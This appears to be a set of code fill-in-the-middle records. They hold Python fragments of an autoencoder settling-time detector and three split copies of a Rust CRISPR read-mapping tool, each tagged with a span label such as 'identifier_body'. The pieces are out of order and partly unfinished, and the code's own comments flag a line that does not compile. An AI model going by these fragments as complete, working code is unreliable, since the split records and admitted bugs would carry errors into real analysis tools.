unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures | identifier_body |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch |
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
}
| {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
} | conditional_block |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) | {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
} | identifier_body | |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) { | }
}
// --------- end of basic algorithm ---
}
